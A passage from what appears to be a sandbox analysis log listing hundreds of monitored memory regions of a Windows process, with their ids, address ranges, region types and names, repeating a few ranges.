pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10286 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10301 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10302 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10303 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10304 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10313 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10314 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10315 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10316 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10330 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10335 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10336 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10337 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10357 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10358 start_va = 0x110f0000 end_va = 0x1116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000110f0000" filename = "" Region: id = 10359 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10360 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10361 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10389 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10390 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10391 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10393 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10400 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10401 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10402 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10403 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10424 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10425 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10426 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10427 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10429 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10430 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10431 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10432 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10433 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10434 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10435 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10436 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10445 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10446 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10447 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10448 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10449 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10450 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10451 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10452 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10454 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10455 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10456 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10457 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10464 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10465 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10466 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10467 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10470 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10471 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10472 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10473 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10474 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10475 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10476 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10477 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10479 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10480 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10481 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10482 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10483 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10484 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10485 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10486 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10487 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10488 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10489 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10490 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10491 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10492 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10493 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10494 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10495 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10496 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10497 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10498 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10499 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10500 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10501 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10502 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10503 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10504 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10505 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10506 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10509 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10510 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10511 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10512 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10516 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10517 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10518 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10519 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10520 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10521 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10522 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10523 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10525 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10526 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10527 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10528 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10529 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10530 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10531 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10532 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10534 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10535 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10536 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10537 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10539 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10540 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10541 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10543 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10546 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10547 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10548 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10549 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10550 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10551 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10552 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10553 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10555 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10556 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10557 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10558 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10560 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10561 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10562 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10563 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10565 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10566 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10567 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10568 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10569 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10571 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10572 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10573 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10575 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10576 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10577 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10578 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10579 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10580 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10581 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10582 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10584 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10586 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10587 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10588 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10590 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10591 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10592 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10593 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10594 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10595 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10596 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10598 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10600 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10601 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10602 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10603 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10604 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10605 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10606 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10607 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10610 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10611 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10612 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10613 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10615 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10616 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10617 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10618 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10619 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10620 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10621 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10622 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10623 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10624 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10625 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10626 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10628 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10629 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10630 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10631 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10635 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10636 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10637 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10638 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10639 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10640 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10641 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 10642 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 